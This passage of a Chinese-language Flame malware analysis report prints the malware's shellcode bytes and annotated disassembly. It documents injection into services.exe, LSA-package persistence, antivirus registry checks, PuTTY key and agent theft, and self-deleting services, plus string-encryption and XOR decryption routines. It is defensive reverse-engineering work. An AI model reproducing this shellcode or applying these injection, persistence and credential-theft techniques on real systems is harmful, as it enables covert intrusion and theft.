    0xFF,0x56,0x0C,0x85,0xC0,0x74,0x28,0xFF,0x45,0x08,0x66,0x8B,0x45,0x08,0x66,0x3B,

    0x47,0x06,0x0F,0x82,0x46,0xFF,0xFF,0xFF,0x8B,0x7F,0x28,0x03,0x7D,0xF4,0x89,0x7D,

    0xE0,0x75,0x18,0xC7,0x45,0xF0,0x12,0x00,0xFF,0xFF,0xE9,0x0C,0x02,0x00,0x00,0xC7,

    0x45,0xF0,0x11,0x00,0xFF,0xFF,0xE9,0x00,0x02,0x00,0x00,0xFF,0xB6,0x1C,0x09,0x00,

    0x00,0x33,0xFF,0x47,0x57,0xFF,0x75,0xF4,0xFF,0x55,0xE0,0x3B,0xC7,0x74,0x14,0x53,

    0x53,0xFF,0x75,0xF4,0xFF,0x55,0xE0,0xC7,0x45,0xF0,0x13,0x00,0xFF,0xFF,0xE9,0xD8,

    0x01,0x00,0x00,0x8D,0x86,0x6A,0x02,0x00,0x00,0x50,0x53,0x8D,0x45,0xA8,0x50,0x89,

    0x7D,0xBC,0xFF,0x56,0x44,0x3B,0xC3,0x89,0x45,0xE8,0x75,0x0C,0xC7,0x45,0xF0,0x14,

    0x00,0xFF,0xFF,0xE9,0xB3,0x01,0x00,0x00,0x6A,0xFF,0x50,0xFF,0x56,0x48,0x85,0xC0,

    0x74,0x0C,0xC7,0x45,0xF0,0x15,0x00,0xFF,0xFF,0xE9,0x9D,0x01,0x00,0x00,0x8D,0x46,

    0x60,0x50,0x53,0x68,0x1F,0x00,0x0F,0x00,0xC6,0x45,0xFB,0x01,0xFF,0x56,0x2C,0x3B,

    0xC3,0x89,0x45,0xE4,0xC6,0x45,0x0B,0x00,0xBF,0x08,0x55,0x00,0x00,0x75,0x28,0x8D,

    0x46,0x60,0x50,0x57,0x53,0x6A,0x04,0x8D,0x45,0xA8,0x50,0x6A,0xFF,0xC6,0x45,0x0B,

    0x01,0xFF,0x56,0x28,0x3B,0xC3,0x89,0x45,0xE4,0x75,0x0C,0xC7,0x45,0xF0,0x16,0x00,

    0xFF,0xFF,0xE9,0x54,0x01,0x00,0x00,0x57,0x53,0x53,0x6A,0x02,0xFF,0x75,0xE4,0xFF,

    0x56,0x30,0x3B,0xC3,0x89,0x45,0xEC,0x75,0x0C,0xC7,0x45,0xF0,0x17,0x00,0xFF,0xFF,

    0xE9,0x36,0x01,0x00,0x00,0x80,0x7D,0x0B,0x00,0x0F,0x84,0x01,0x01,0x00,0x00,0x57,

    0x53,0xFF,0x75,0xEC,0xFF,0x56,0x24,0x83,0xC4,0x0C,0x89,0x5D,0xD0,0x8D,0xBE,0xFA,

    0x04,0x00,0x00,0x57,0xFF,0x56,0x14,0x3B,0xC3,0x89,0x45,0xB4,0x74,0x3B,0xFF,0x45,

    0xD0,0x83,0x7D,0xD0,0x05,0x7C,0xEC,0x53,0x6A,0x18,0x8D,0x45,0x90,0x50,0x53,0x6A,

    0xFF,0xFF,0x56,0x3C,0x3D,0x00,0x00,0x00,0xC0,0x72,0x2A,0x53,0x6A,0x18,0x8D,0x45,

    0x90,0x50,0x53,0x6A,0xFF,0xFF,0x56,0x3C,0x83,0xF8,0xFF,0x77,0x18,0xC7,0x45,0xF0,

    0x19,0x00,0xFF,0xFF,0xE9,0xD2,0x00,0x00,0x00,0xC7,0x45,0xF0,0x18,0x00,0xFF,0xFF,

    0xE9,0xC6,0x00,0x00,0x00,0x8B,0x45,0x94,0x8B,0x40,0x0C,0x83,0xC0,0x0C,0x8B,0x38,

    0xEB,0x0A,0x8B,0x4F,0x18,0x3B,0x4D,0xB4,0x74,0x08,0x8B,0x3F,0x3B,0xF8,0x75,0xF2,

    0xEB,0x68,0x8B,0x47,0x1C,0x8B,0x4D,0xEC,0x89,0x41,0x04,0x8B,0x86,0x18,0x09,0x00,

    0x00,0x6A,0x40,0x68,0x00,0x10,0x00,0x00,0x83,0xC0,0x14,0x50,0x53,0xFF,0x56,0x04,

    0x3B,0xC3,0x75,0x09,0xC7,0x45,0xF0,0x1A,0x00,0xFF,0xFF,0xEB,0x7E,0x8B,0x4E,0x20,

    0x89,0x48,0x10,0x8B,0x4E,0x38,0x89,0x48,0x0C,0x8B,0x4E,0x48,0x89,0x48,0x08,0x8B,

    0x4D,0xEC,0xC7,0x00,0xBA,0xBA,0x0D,0xF0,0x89,0x48,0x04,0xFF,0xB6,0x18,0x09,0x00,

    0x00,0x83,0xC0,0x14,0xFF,0xB6,0x14,0x09,0x00,0x00,0x89,0x45,0xB4,0x50,0xFF,0x56,

    0x20,0x8B,0x45,0xB4,0x83,0xC4,0x0C,0x89,0x47,0x1C,0x8B,0x45,0xEC,0x39,0x58,0x04,

    0x75,0x09,0xC7,0x45,0xF0,0x1B,0x00,0xFF,0xFF,0xEB,0x30,0x8B,0x4D,0xE8,0x89,0x08,

    0x8B,0x4D,0xEC,0x33,0xC0,0x33,0xD2,0x83,0xC1,0x08,0x3B,0xC3,0x75,0x26,0x39,0x19,

    0x75,0x02,0x8B,0xC1,0x42,0x81,0xC1,0x20,0x02,0x00,0x00,0x83,0xFA,0x28,0x72,0xEA,

    0x3B,0xC3,0x75,0x10,0xC7,0x45,0xF0,0x1C,0x00,0xFF,0xFF,0x8B,0x7D,0xF4,0xC6,0x45,

    0xFA,0x01,0xEB,0x5F,0x8B,0x4D,0xE0,0x8B,0x7D,0xF4,0x89,0x48,0x04,0x89,0x38,0xC7,

    0x40,0x08,0x01,0x00,0x00,0x00,0x8B,0x8E,0x1C,0x09,0x00,0x00,0x89,0x48,0x0C,0x8A,

    0x8E,0x20,0x09,0x00,0x00,0x88,0x48,0x10,0x8B,0x8E,0x10,0x09,0x00,0x00,0x89,0x88,

    0x1C,0x02,0x00,0x00,0x68,0x0A,0x02,0x00,0x00,0x8D,0x8E,0x04,0x07,0x00,0x00,0x51,

    0x83,0xC0,0x12,0x50,0xFF,0x56,0x20,0x83,0xC4,0x0C,0x80,0x7D,0x0B,0x00,0x74,0x13,

    0xFF,0x75,0xE8,0x89,0x5D,0xEC,0x89,0x5D,0xE4,0xFF,0x56,0x38,0xC6,0x45,0xFB,0x00,

    0x89,0x5D,0xE8,0x39,0x5D,0xEC,0x74,0x06,0xFF,0x75,0xEC,0xFF,0x56,0x34,0x39,0x5D,

    0xE4,0x74,0x06,0xFF,0x75,0xE4,0xFF,0x56,0x4C,0x80,0x7D,0xFB,0x00,0x74,0x06,0xFF,

    0x75,0xE8,0xFF,0x56,0x38,0x39,0x5D,0xE8,0x74,0x06,0xFF,0x75,0xE8,0xFF,0x56,0x4C,

    0xFF,0x75,0xC0,0xFF,0x56,0x54,0x39,0x5D,0xDC,0x74,0x06,0xFF,0x75,0xDC,0xFF,0x56,

    0x5C,0x80,0x7D,0xFA,0x00,0xB8,0x1E,0x00,0xFF,0xFF,0x74,0x2C,0x39,0x5D,0xBC,0x74,

    0x0B,0x39,0x5D,0xE0,0x74,0x06,0x53,0x53,0x57,0xFF,0x55,0xE0,0x80,0xBE,0x20,0x09,

    0x00,0x00,0x00,0x74,0x06,0x57,0xFF,0x56,0x34,0xEB,0x0A,0x68,0x00,0x80,0x00,0x00,

    0x53,0x57,0xFF,0x56,0x08,0x8B,0x45,0xF0,0x89,0xBE,0x2C,0x0B,0x00,0x00,0xEB,0x05,

    0xB8,0x05,0x00,0xFF,0xFF,0x5F,0x5E,0x5B,0xC9,0xC2,0x04,0x00,0x68

    第三次接着上面的Shell Code地址顺序写入:
    写入数据为,长度为4
    0x00,0x00,0x00,0x00
    第四次接着上面的Shell Code地址顺序写入:
    Shell Code如下文件,长度为:0x5e2330
    最后恶意代码通过函数CreateRemoteThread函数来创建远程线程,执行刚才写入到Services.exe进程中的Shell code。
    发现对注册表进行操作:
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SeCEdit

    1. 疑似组策略键值

    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation

    1. StandardSize,修改标准时间

    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:(ahyy)
    键值: 类型: REG_BINARY 长度:16 (0x10) 字节 s
    05 00 00 00 06 00 00 00 20 3E 44 29 E3 54 CD 01  |  ........ >D)鉚?
    HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\11
    键值: 类型: REG_BINARY 长度:56 (0x38) 字节 s
    000000: 36 00 31 00 00 00 00 00 C8 40 0A 0F 10 00 66 6C  |  6.1.....菮....fl
    000010: 61 6D 65 00 22 00 03 00 04 00 EF BE DC 40 EF 1C  |  ame.".....锞蹳?
    000020: DC 40 18 1D 14 00 00 00 66 00 6C 00 61 00 6D 00  |  蹳......f.l.a.m.
    000030: 65 00 00 00 14 00 00 00                          |  e.......
    HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\11\
    HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\11\0
    键值: 类型: REG_BINARY 长度:78 (0x4e) 字节 s
    000000: 4C 00 31 00 00 00 00 00 C7 40 EA 39 10 00 6D 73  |  L.1.....茾?..ms
    000010: 73 65 63 6D 67 72 2E 6F 63 78 00 00 30 00 03 00  |  secmgr.ocx..0...
    000020: 04 00 EF BE DC 40 F5 1C DC 40 09 1D 14 00 00 00  |  ..锞蹳?蹳......
    000030: 6D 00 73 00 73 00 65 00 63 00 6D 00 67 00 72 00  |  m.s.s.e.c.m.g.r.
    000040: 2E 00 6F 00 63 00 78 00 00 00 1C 00 00 00        |  ..o.c.x.......
    HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\11\0\
    HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\11\0\0
    键值: 类型:REG_BINARY 长度:54 (0x36) 字节 s
    000000: 34 00 35 00 00 00 00 00 DC 40 CB 1B 10 00 D8 53  |  4.5.....蹳?..豐
    000010: CD 79 31 00 00 00 1E 00 03 00 04 00 EF BE DC 40  |  蛓1.........锞蹳
    000020: F6 1C DC 40 08 1D 14 00 00 00 D8 53 CD 79 31 00  |  ?蹳......豐蛓1.
    000030: 00 00 16 00 00 00                                |  ......
    HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\11\0\0\
    HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\11\0\0\MRUListEx
    键值: 类型: REG_BINARY 长度:4 (0x4) 字节 s
    FF FF FF FF                                      |  
    HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\11\0\0\NodeSlot
    键值: DWORD: 96 (0x60)
    HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\11\0\MRUListEx
    键值: 类型: REG_BINARY 长度: 8 (0x8) 字节 s
    00 00 00 00 FF FF FF FF                          |  ....
    HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\11\0\NodeSlot
    键值: DWORD: 95 (0x5f)

    HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\11\MRUListEx
    键值: 类型: REG_BINARY 长度: 8 (0x8) 字节 s
        00 00 00 00 FF FF FF FF                          |  ....
    HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\11\NodeSlot
    键值: DWORD: 94 (0x5e)
    HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\Bags\94\
    HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\Bags\94\Shell\
    HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\Bags\94\Shell\Address
    键值: DWORD: 4294967295 (0xffffffff)
    HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\Bags\94\Shell\Buttons
    键值: DWORD: 4294967295 (0xffffffff)
    HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\Bags\94\Shell\Col
    键值: DWORD: 4294967295 (0xffffffff)
    HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\Bags\94\Shell\ColInfo
    键值: 类型: REG_BINARY 长度: 112 (0x70) 字节 s
        000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |  ................
        000010: FD DF DF FD 0F 00 04 00 20 00 10 00 28 00 3C 00  |  啐.... ...(.<.
        000020: 00 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00  |  ................
        000030: B4 00 60 00 78 00 78 00 00 00 00 00 01 00 00 00  |  ?`.x.x.........
           ...更多...
    开机启动:
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Authentication Packages
    新: 类型: REG_MULTI_SZ 长度: 21 (0x15) 字节 s
        6D 73 76 31 5F 30 00 6D 73 73 65 63 6D 67 72 2E  |  msv1_0.mssecmgr.
        6F 63 78 00 00                                   |  ocx..
    旧: 类型: REG_MULTI_SZ 长度: 8 (0x8) 字节 s
        6D 73 76 31 5F 30 00 00                          |  msv1_0..
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction\LcnEndLocation
    新; 字符串: "10675834"
    旧; 字符串: "0"
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction\LcnStartLocation
    新: 字符串: "10485101"
    旧: 字符串: "0"
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction\OptimizeComplete
    新: 字符串: "Yes"
    旧: 字符串: "No"
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction\OptimizeError
    新:字符串: " "
    旧:字符串: "Missing Registry Entries"
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SeCEdit
    HKLM\Software\Microsoft\Internet Explorer\LowRegistry
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option
    HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation
    HKLM\SOFTWARE\Symantec\Norton AntiVirus
    HKLM\SOFTWARE\Symantec\InstalledApps
    HKLM\SOFTWARE\KasperskyLab\avp6\settings
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings
    HKLM\SOFTWARE\KasperskyLab
    HKLM\SOFTWARE\Symantec\SymSetup\Internet security
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    HKLM\SOFTWARE\Symantec\Symantec AntiVirus
    HKLM\SYSTEM\CurrentControlSet\Control\Lsa
    HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
    HKIU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
    HKLM\Software\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Capture\%s\properties
    发现Flame遍历系统中所有顶层窗口,查找类名与窗口名都为”Pageant”的窗口并向其发送消息。经确认Pageant为Putty程序的认证代理工具,可以添加用户私钥,之后第一次登陆服务器时输入密码Pageant会将密码保存,以后则不需要输入密码。
    SendMessageA( Msg=0x4a,wParam=0x00,lParam=0x804e50ba)
    发现Flame恶意代码创建一个桌面,然后创建进程Iexplorer.exe并将其默认桌面设置为新创建的桌面,可能为达到隐藏启动的目的。

    mov     [ebp+StartupInfo.cb], 44h

    mov     eax, lpszDesktop

    mov     [ebp+StartupInfo.lpDesktop], eax ; set desktop

    mov     [ebp+CommandLine], bl

    mov     esi, 104h

    push    esi

    push    ebx

    lea     eax, [ebp+VersionInformation]

    push    eax             ; pVersionInformation

    call    0x101A1130

    add     esp, 0Ch

    push    esi             ; nSize

    lea     eax, [ebp+CommandLine]

    push    eax          ; "%ProgramFiles%\Internet Explorer\iexplore.exe"

    push    environment_strings

    call    ExpandEnvironmentStringsA

    cmp     eax, ebx

    jz      0x100E3157

    cmp     eax, esi

    ja      0x100E3157

    lea     eax, [ebp+ProcessInformation]

    push    eax             ; lpProcessInformation

    lea     eax, [ebp+StartupInfo]

    push    eax             ; lpStartupInfo

    push    ebx             ; lpCurrentDirectory

    push    ebx             ; lpEnvironment

    push    4               ; dwCreationFlags

    push    ebx             ; bInheritHandles

    push    ebx             ; lpThreadAttributes

    push    ebx             ; lpProcessAttributes

    lea     eax, [ebp+CommandLine]

    push    eax             ; lpCommandLine

    push    ebx             ; lpApplicationName

    call    ds:CreateProcessA

    分析中发现大量SQL语句,这些语句是操作SQLite数据库中的相关数据。

    SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0

     

    UPDATE %s SET Grade = (SELECT %d/%d.0*(rowid - 1) FROM st WHERE st.ProdID = %s.ProdID);

    ELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' 

    INSERT OR REPLACE INTO Configuration (Name, App, Value) VALUES('%s','%s' ,'%s');

     

    INSERT OR IGNORE INTO %s (Name,App,Value) Values('STORAGE_LENGTH','%s',0);

     

    UPDATE sqlite_master SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;

    INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);

     

    UPDATE %s SET Value = Value - old.BufferSize WHERE Name = 'STORAGE_SIZE' AND App = '%s';

     

    UPDATE %s SET Value = Value + 1 WHERE Name = 'STORAGE_LENGTH' AND App = '%s';

     

    SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence'; 

     

    UPDATE %s SET Value = Value - 1 WHERE Name = 'STORAGE_LENGTH' AND App = '%s';

     

    UPDATE %s SET Value = Value + new.BufferSize WHERE Name = 'STORAGE_SIZE' AND App = '%s';

     

    UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;

     

    UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');

     

    INSERT OR IGNORE INTO %s (Name,App,Value) Values('STORAGE_SIZE','%s',0);

    WQL

    WQL的全称是WMI Query Language,简称为WQL, Windows管理规范查询语言。
    root\ CIMV2
    select * from Win32_LogicalDisk
    SELECT * FROM __InstanceOperationEvent WITHIN %d WHERE TargetInstance ISA 'Win32_LogicalDisk'
    select ProcessID, Name from Win32_Process

    创建以下命名管道

    \\.\pipe\navssvcs
    \\.\pipe\PipeGx16
    \\.\\pipe\spoolss
    分析过程中发现一些函数存在类似加花的指令,这些指令并不影响程序的任何功能,如下红色部分代码。

    push    ebp

    mov     ebp, esp

    push    ebx

    push    esi

    push    edi

    mov     eax, eax

    push    ebx

    push    eax

    pop     eax

    pop     ebx

    pusha

    popa

    mov     esi, [ebp+8]

    Flame在单独的线程修改权限,打开并创建服务,加载运行Rdcvlt32.exe程序。

    push    edi             ; lpPassword

    push    edi             ; lpServiceStartName

    push    edi             ; lpDependencies

    push    edi             ; lpdwTagId

    push    edi             ; lpLoadOrderGroup

    push    PathName        ; lpBinaryPathName =

    ;"%windir%\system32\rdcvlt32.exe"

    push    edi             ; dwErrorControl

    push    3               ; dwStartType

    push    10h             ; dwServiceType

    push    0F01FFh         ; dwDesiredAccess

    push    DisplayName     ; lpDisplayName

    push    ServiceName     ; lpServiceName

    push    eax             ; hSCManager

    call    CreateServiceA

    cmp     eax, edi

    并且在创建完服务后直接将其启动,并删除服务,清理掉注册表相关痕迹。

    mov     eax, [ebx+4]

    mov     byte ptr [eax+6], 1

    call    start_service

    mov     [ebp-1], al

    mov     eax, edi

    call    delete_service

    cmp     al, 1

    jnz     0x1011BCD9

     

    各个模块字符串的加密部分析

    各个模块的加密部分存在很大的相通相同处。采用的算法主要是通过如下方式:

    图 3-5加密算法

     

    各个文件采取的算法参数和算式如下:

    File name

    Param a

    Param b

    Param c

    M

    Mssecmgr.ocx

    0xBh

    0xBh+0xCh

    [0x10376F70h]

    M=(0xBh+n)*(0xBh+0xCh+n)+[0x101376F70h]

    Msglu32.ocx

    0xBh

    0xBh+0xCh

    [0x101863ECh]

    M=(0xBh+n)*(0xBh+0xCh+n)+[0x101863ECh]

    Advnetcfg.ocx

    0x1Ah

    0x5h

    0

    M==(0xAh+n)*(0x5h+n)

    Nteps32.ocx

    0x1Ah

    0x5h

    0

    M==(0xAh+n)*(0x5h+n)

    Soapr32.ocx

    0x11h

    0xBh

    0

    M==(0x11h+n)*(0xbh+n)

    Noname.dll

    0x11h

    0xBh

    0

    M==(0x11h+n)*(0xbh+n)

    Jimmy.dll

    0xBh

    0xBh+0x6h

    0x58h

    M=(0xbh+N)*(N+0xbh+0x6h)+0x58h

    Comspol32.ocx

    0xBh

    0xBh+0x6h

    0

    M=(0xbh+N)*(N+0xbh+0x6h)

    Browse32.ocx

    0xBh

    0xBh+0xch

    0

    M=(0xbh+N)*(N+0xbh+0xch)

    发现Flame读取PUTTY创建Key的临时文件内容,可能为破解通讯密钥。
    %Documents and Settings%\Administrator\PUTTY.RND

    lea     eax, putty_file_path[eax]

    push    eax             ; lpBuffer

    push    offset str_HOMEPATH ; decode:"HOMEPATH"

    call    my_decode_strA  ; decode: "HOMEPATH"

    pop     ecx

    push    eax             ; lpName

    call    edi ; GetEnvironmentVariableA

    test    eax, eax

    jnz     short 0x10073E35

    push    esi             ; uSize

    push    ebx             ; lpBuffer

    call    ds:GetWindowsDirectoryA

    push    ebx             ; c1

    call    0x101A1370

    pop     ecx

    mov     esi, eax

    jmp     short 0x10073E3B

    add     [ebp+var_4], eax

    mov     esi, [ebp+var_4]

    push    offset str_PUTTY_RND ; data

    call    my_decode_strA  ; decode : "\PUTTY.RND"

    push    eax

    lea     eax, putty_file_path[esi]

    push    eax

    call    0x101A1270  ;  cat path

     

    push    ebx             ; hTemplateFile

    push    ebx             ; dwFlagsAndAttributes

    push    3               ; dwCreationDisposition

    push    ebx             ; lpSecurityAttributes

    push    3               ; dwShareMode

    push    80000000h       ; dwDesiredAccess

    push    offset putty_file_path ; lpFileName

    call    ds:CreateFileA

    cmp     eax, 0FFFFFFFFh

    mov     [ebp+hObject], eax

    jz      short 0x10073EE6

    push    esi

    mov     esi, ds:ReadFile    ;read putty.rnd file

    图 3-6在内存中发现的一些LUA模块名

    下面为Lua源文件:

    const char *const luaP_opnames[NUM_OPCODES+1] = {

      "MOVE",

      "LOADK",

      "LOADBOOL",

      "LOADNIL",

      "GETUPVAL",

      "GETGLOBAL",

      "GETTABLE",

      "SETGLOBAL",

      "SETUPVAL",

      "SETTABLE",

      "NEWTABLE",

      "SELF",

      "ADD",

      "SUB",

      "MUL",

      "DIV",

      "MOD",

      "POW",

      "UNM",

      "NOT",

      "LEN",

      "CONCAT",

      "JMP",

      "EQ",

      "LT",

      "LE",

      "TEST",

      "TESTSET",

      "CALL",

      "TAILCALL",

      "RETURN",

      "FORLOOP",

      "FORPREP",

      "TFORLOOP",

      "SETLIST",

      "CLOSE",

      "CLOSURE",

      "VARARG",

      NULL

    };

    发现内容完全一致,在分析过程中又发现大量Lua代码因此得出恶意代码是静态的将Lua代码编译进程序中的。
    发现Flame内部包含的Lua代码的版本为Lua 5.1

    mov eax,edi

    call mssecmgr.100B8F0F

    push mssecmgr.1026195C     ;  ASCII "_G"

    mov eax,edi

    call mssecmgr.100B9417

    pop ecx

    mov eax,mssecmgr.10261778

    mov ebx,mssecmgr.10261960  ;  ASCII "_G"

    mov ecx,esi

    call mssecmgr.100B9DB3

    push 0x7

    push mssecmgr.10261964     ;  ASCII "Lua 5.1"

    mov eax,esi

    call mssecmgr.100B9142

    push mssecmgr.1026196C     ;  ASCII "_VERSION"

    mov eax,edi

    call mssecmgr.100B9417

    add esp,0xC

    push mssecmgr.100CF1E6

    push mssecmgr.100CF23B

    push mssecmgr.10261978     ;  ASCII "ipairs"

    mov eax,esi

    call mssecmgr.100CFAE7

    add esp,0xC

    push mssecmgr.100CF171

    push mssecmgr.100CF1B0

    push mssecmgr.10261980     ;  ASCII "pairs"

    mov eax,esi

    call mssecmgr.100CFAE7

    add esp,0xC

    push 0x1

    push 0x0

    mov eax,esi

    call mssecmgr.100B932F

    or eax,-0x1

    call mssecmgr.100B8F0F

    push -0x2

    pop eax

    call mssecmgr.100B953A

    push 0x2

    push mssecmgr.10261988     ;  ASCII "kv"

    图 3-7 Flame代码

     

    static void base_open (lua_State *L) {

      /* set global _G */

      lua_pushvalue(L, LUA_GLOBALSINDEX);

      lua_setglobal(L, "_G");

      /* open lib into global table */

      luaL_register(L, "_G", base_funcs);

      lua_pushliteral(L, LUA_VERSION);  //LUA_VERSION : "Lua 5.1"

      lua_setglobal(L, "_VERSION");  /* set global _VERSION */

      /* `ipairs' and `pairs' need auxliliary functions as upvalues */

      auxopen(L, "ipairs", luaB_ipairs, ipairsaux);

      auxopen(L, "pairs", luaB_pairs, luaB_next);

      /* `newproxy' needs a weaktable as upvalue */

      lua_createtable(L, 0, 1);  /* new table `w' */

      lua_pushvalue(L, -1);  /* `w' will be its own metatable */

      lua_setmetatable(L, -2);

      lua_pushliteral(L, "kv");

      lua_setfield(L, -2, "__mode");  /* metatable(w).__mode = "kv" */

      lua_pushcclosure(L, luaB_newproxy, 1);

      lua_setglobal(L, "newproxy");  /* set global `newproxy' */

    图 3-8 Lua代码

    Flame中包含的结构与Lua5.1一致。

    图 3-9Flame中的LUA结构

    static const luaL_Reg base_funcs[] = {

      {"assert", luaB_assert},

      {"collectgarbage", luaB_collectgarbage},

      {"dofile", luaB_dofile},

      {"error", luaB_error},

      {"gcinfo", luaB_gcinfo},

      {"getfenv", luaB_getfenv},

      {"getmetatable", luaB_getmetatable},

      {"loadfile", luaB_loadfile},

      {"load", luaB_load},

      {"loadstring", luaB_loadstring},

      {"next", luaB_next},

      {"pcall", luaB_pcall},

      {"print", luaB_print},

      {"rawequal", luaB_rawequal},

      {"rawget", luaB_rawget},

      {"rawset", luaB_rawset},

      {"select", luaB_select},

      {"setfenv", luaB_setfenv},

      {"setmetatable", luaB_setmetatable},

      {"tonumber", luaB_tonumber},

      {"tostring", luaB_tostring},

      {"type", luaB_type},

      {"unpack", luaB_unpack},

      {"xpcall", luaB_xpcall},

      {NULL, NULL}

    };

    图 3-10Lua 5.1 中的结构

    而Lua5.1版本发布的时间为2006年2月21日,Lua 5.2版本发布日期为2011年12月16日。这也间接证明了Flame的开发时间应为2006年2月21日至2011年12月16日之间。
    同时在分析过程中发现了大量的Lua脚本函数名见附录七(详见附录七为Mssecmgr.ocx文件中使用Lua脚本函数列表内容)可以通过这些函数名来辅助判断Lua脚本功能。
    在主程序地址10266CE处发现可以被RawDES 算法使用的数组RawDES_Spbox。
    通过对调用该地址的函数进行分析,确认该程序确实使用了des加密算法。
    说明如下:
    通过对调用该地址的函数进行分析。发现调用函数中有16处循环计算表达式。是DES加密算法的明显特征。计算出每个数值后,后面的异或操作也和DES算法的计算方式匹配。
    对函数的调用,其参数的第三个为加密的密钥。
    int  0x10084393 (int a1, unsigned int a2, int a3, int a4)
    主模块加载资源到内存,进行简单异或解密,算法代码如下:
    首先传入DB DF AC A2 作为文件头,然后对资源逐字节解密。
    判断当前字节是否是0XA9:
    如果是,则直接与前一解密后的数据异或,结果为解密后的数据。
    如果不是,则将EDX赋值为0XA9后,并与EDX异或,得出结果在与前一解密后的数据异或。最后得出的结果为解密后的数据。

    10050898  mov al,byte ptr ds:[esi]

    1005089A  test al,al

    1005089C  je short 0x100508A9

    1005089E  cmp al,0xA9

    100508A0  je short 0x100508A9

    100508A2  mov edx,0xA9

    100508A7  jmp short 0x100508AB

    100508A9  xor edx,edx

    100508AB  xor al,dl

    100508AD  xor cl,al

    100508AF  mov byte ptr ds:[edi+esi],cl

    100508B2  inc esi

    100508B3  dec dword ptr ss:[esp+0xC]

    100508B7  jnz short 0x10050898

    经过对Flame调用Lua函数的分析总结发现Flame调用Lua脚本的方式。首先程序在初始化过程中在Lua环境内创建一些表,然后在这些表中保存Key,Value形式的键值对,后续通过获取指定的表,然后将表中指定的Key的值取出来,作为Lua代码执行。如以下代码所示,Flame的表名,及Key的名字时全部都是加密存储,使用时在将其解密。

    mov eax,esi

    call mssecmgr.100B932F                   ;  lua_createtable

    mov esi,dword ptr ds:[edi+0xD4]

    push mssecmgr.10304B78

    call mssecmgr.1000E431                   ;  decode string "script"

    add esp,0xC

    push eax

    call mssecmgr.100B917A                   ;  lua_pushstring

    mov eax,dword ptr ds:[edi+0xBC]

    mov edx,dword ptr ds:[edi+0xD4]

    pop ecx

    push eax

    lea ecx,dword ptr ds:[edi+0xB0]

    call mssecmgr.1000757C

    push eax

    mov eax,edx

    call mssecmgr.100B9142                   ;  lua_pushlstring

    mov esi,dword ptr ds:[edi+0xD4]

    pop ecx

    pop ecx

    push -0x3

    pop eax

    call mssecmgr.100B93F4                   ;  lua_settable : set value

    lea ecx,dword ptr ds:[edi+0x8C]

    mov eax,dword ptr ds:[ecx]

    图 3-11设置script的值

     

    mov esi,dword ptr ds:[ebx+0xD4]

    push mssecmgr.10304BB0

    call mssecmgr.1000E431                   ;  decode string "_params"

    pop ecx

    push eax

    mov eax,-0x2712
